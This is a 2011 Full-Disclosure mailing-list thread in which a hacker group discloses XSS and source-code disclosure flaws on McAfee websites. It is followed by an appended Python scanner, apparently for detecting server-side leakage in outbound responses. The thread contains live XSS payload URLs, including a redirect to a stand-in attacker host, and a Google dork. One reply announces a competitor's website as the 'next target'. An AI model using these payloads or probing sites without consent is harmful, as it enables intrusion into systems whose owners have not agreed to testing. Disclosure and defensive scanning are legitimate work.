On Wed, Mar 30, 2011 at 1:49 PM, Benji <[email protected]> wrote:
> I'm sure they pjear the xss 4nd w3bbug f1nd1ng sk1llz of the renowned
> ethical hacking group YGN!!!111
>
> (Plzdontxssme)
>
> On 3/30/11, YGN Ethical Hacker Group <[email protected]> wrote:
> > According to xssed.com, there are two remaining XSS issues:
> >
> > https://kb.mcafee.com/corporate/index?page=content&id="; alert(1); //
> > https://kc.mcafee.com/corporate/index?page=content&id="; alert(1); //
> >
> > You guys know our disclosed issues are very simple and can easily be
> > found through viewing HTML/JS source codes and simple Google Hacking
> > (http://www.google.com/search?q=%22%3C%25+Dim++site%3Adownload.mcafee.com).
> >
> > However, it was criticized as 'illegal break-in' by Cenzic's CMO,
> > http://www.cenzic.com/company/management/khera/, according to Network
> > World News editor - Ellen Messmer. Thus, the next target is Cenzic
> > web site. Let's see how strong the Kung-Fu of Cenzic HailStorm scanner
> > is.
> >
> > ---------------------------------
> > Best regards,
> > YGN Ethical Hacker Group
> > Yangon, Myanmar (Burma)
> > http://yehg.net
> > Our Lab | http://yehg.net/lab
> > Our Directory | http://yehg.net/hwd
> >
> > On Tue, Mar 29, 2011 at 9:01 PM, Pablo Ximenes <[email protected]> wrote:
> >> FYI
> >>
> >> http://it.slashdot.org/story/11/03/28/209230/McAfees-Website-Full-of-Security-Holes
> >>
> >> Pablo Ximenes
> >> http://ximen.es/
> >> http://twitter.com/pabloximenes
> >>
> >> 2011/3/28 Pablo Ximenes <[email protected]>:
> >>> blog post about this: http://ximen.es/?p=469
> >>>
> >>> Please, don't throw stones at me.
> >>>
> >>> []'s
> >>>
> >>> Pablo Ximenes
> >>> http://ximen.es/
> >>> http://twitter.com/pabloximenes
> >>>
> >>> 2011/3/27 YGN Ethical Hacker Group <[email protected]>
> >>>>
> >>>> Vulnerabilities in *McAfee.com
> >>>>
> >>>> 1. VULNERABILITY DESCRIPTION
> >>>>
> >>>> -> Cross Site Scripting
> >>>>
> >>>> http://download.mcafee.com/products/webhelp/4/1033/#javascript:top.location.replace('attacker.in')
> >>>>
> >>>> -> Information Disclosure > Internal Hostname:
> >>>> http://www.mcafee.com/js/omniture/omniture_profile.js
> >>>>
> >>>> ($ ruby host-extract.rb -a http://www.mcafee.com/js/omniture/omniture_profile.js)
> >>>>
> >>>> -> Information Disclosure > Source Code Disclosure:
> >>>>
> >>>> view-source:http://download.mcafee.com/clinic/includes/commoninc/cookiecommon.asp
> >>>> view-source:http://download.mcafee.com/clinic/includes/commoninc/appcommon.asp
> >>>> view-source:http://download.mcafee.com/clinic/includes/commoninc/partnerCodesLibrary.asp
> >>>> view-source:http://download.mcafee.com/clinic/Includes/common.asp
> >>>> view-source:http://download.mcafee.com/updates/upgrade_patches.asp
> >>>> view-source:http://download.mcafee.com/updates/common/dat_common.asp
> >>>> view-source:http://download.mcafee.com/updates/updates.asp
> >>>> view-source:http://download.mcafee.com/updates/superDat.asp
> >>>> view-source:http://download.mcafee.com/eval/evaluate2.asp
> >>>> view-source:http://download.mcafee.com/common/ssi/conditionals.asp
> >>>> view-source:http://download.mcafee.com/common/ssi/errHandler_soft.asp
> >>>> view-source:http://download.mcafee.com/common/ssi/variables.asp
> >>>> view-source:http://download.mcafee.com/common/ssi/standard/oem/oem_controls.asp
> >>>> view-source:http://download.mcafee.com/common/ssi/errHandler.asp
> >>>> view-source:http://download.mcafee.com/common/ssi/common_subs.asp
> >>>> view-source:http://download.mcafee.com/us/upgradeCenter/productComparison_top.asp
> >>>> view-source:http://download.mcafee.com/us/bannerAd.asp
> >>>> view-source:http://download.mcafee.com/common/ssi/standard/global_foot_us.asp
> >>>>
> >>>> 2. RECOMMENDATION
> >>>>
> >>>> - Fully utilize McAfee FoundStone Experts
> >>>> - Use outbound monitoring of traffic to detect potential information
> >>>> leakage
> >>>>
> >>>> 3. VENDOR
> >>>>
> >>>> McAfee Inc
> >>>> http://www.mcafee.com
> >>>>
> >>>> 4. DISCLOSURE TIME-LINE
> >>>>
> >>>> 2011-02-10: reported vendor
> >>>> 2011-02-12: vendor replied "we are working to resolve the issue as
> >>>> quickly as possible"
> >>>> 2011-03-27: vulnerability found to be unfixed completely
> >>>> 2011-03-27: vulnerability disclosed
> >>>>
> >>>> 5. REFERENCES
> >>>>
> >>>> Original Advisory URL:
> >>>> http://yehg.net/lab/pr0js/advisories/sites/mcafee.com/[mcafee]_xss_infoleak
> >>>> Former Disclosure, 2008:
> >>>> http://www.theregister.co.uk/2008/06/13/security_giants_xssed/
> >>>> Former Disclosure, 2009:
> >>>> http://news.softpedia.com/news/McAfee-Websites-Vulnerable-to-Attacks-110667.shtml
> >>>> Former Disclosure, 2010:
> >>>> http://security-sh3ll.blogspot.com/2010/04/mcafee-communities-xss-defacement.html
> >>>> host-extract: http://code.google.com/p/host-extract/
> >>>> Demo:
> >>>> http://yehg.net/lab/pr0js/training/view/misc/XSSing_McAfee_Secured/
> >>>> xssed: http://www.xssed.com/search?key=mcafee.com
> >>>> Lesson Learned:
> >>>> http://blogs.mcafee.com/mcafee-labs/from-xss-to-root-lessons-learned-from-a-security-breach
> >>>>
> >>>> #yehg [2011-03-27]
> >>>>
> >>>> _______________________________________________
> >>>> Full-Disclosure - We believe in it.
> >>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >>>> Hosted and sponsored by Secunia - http://secunia.com/
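The quoted advisory recommends outbound monitoring to detect information leakage. The following is an added example, not part of the original thread or any participant's code: a check a site operator could run over their own outbound response bodies to flag unprocessed ASP source, SSI directives, private addresses and internal hostnames. The function name, the internal suffix list and the sample responses are assumptions constructed for illustration.

```python
import ipaddress
import re

# Server-side markers that should never reach a client: classic ASP
# delimiters and SSI include directives mean a file was served unprocessed.
ASP_BLOCK = re.compile(r"<%.*?%>", re.S)
SSI_INCLUDE = re.compile(r"<!--\s*#include\s+(?:file|virtual)\s*=", re.I)
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# Assumption: internal names end in one of these suffixes; adjust per site.
INTERNAL_HOST = re.compile(
    r"\b[a-z0-9][a-z0-9-]*(?:\.[a-z0-9-]+)*\.(?:corp|internal|local|lan)\b", re.I)


def scan_response(url, body):
    """Return sorted (url, kind, evidence) findings for one response body."""
    findings = set()
    for m in ASP_BLOCK.finditer(body):
        findings.add((url, "asp-source", m.group(0)[:40]))
    if SSI_INCLUDE.search(body):
        findings.add((url, "ssi-directive", "#include"))
    for m in IPV4.finditer(body):
        try:
            if ipaddress.ip_address(m.group(0)).is_private:
                findings.add((url, "private-ip", m.group(0)))
        except ValueError:
            pass  # not a valid address, e.g. 999.1.1.1
    for m in INTERNAL_HOST.finditer(body):
        findings.add((url, "internal-host", m.group(0).lower()))
    return sorted(findings)


# Constructed sample responses (not taken from any real site).
SAMPLES = {
    "/includes/common.asp": '<%\nDim connStr\nconnStr = "Server=10.1.2.3"\n%>\n'
                            '<!-- #include file="vars.asp" -->',
    "/js/profile.js": 'var s_trackingServer = "metrics01.corp";',
    "/index.html": "<html><body>Version 1.2.3.4 released</body></html>",
}

if __name__ == "__main__":
    for path, body in SAMPLES.items():
        for finding in scan_response(path, body):
            print(finding)
```

The public-looking version string in the last sample is deliberately not flagged, since only private address ranges count as leakage here.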
